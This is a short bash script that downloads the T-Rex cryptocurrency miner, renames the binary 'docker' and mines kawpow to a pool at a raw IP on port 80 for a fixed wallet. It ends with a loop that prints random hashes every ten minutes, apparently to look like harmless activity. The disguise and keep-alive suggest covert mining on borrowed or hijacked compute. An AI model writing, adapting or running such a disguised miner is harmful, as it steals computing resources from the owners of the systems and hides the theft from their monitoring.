#!/bin/bash
apt-get update ; apt-get install sudo -y
wget https://github.com/trexminer/T-Rex/releases/download/0.26.8/t-rex-0.26.8-linux.tar.gz && tar -xvf t-rex-0.26.8-linux.tar.gz >/dev/null 2>&1
mv t-rex docker
./docker -a kawpow -o stratum+tcp://143.42.69.250:80 -u NYyMAuKJ2PSG6Qctw9fuVKufGuxdRRdf7h.$(echo $(shuf -i 1000-9999 -n 1)-C) -p x
while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 10m; done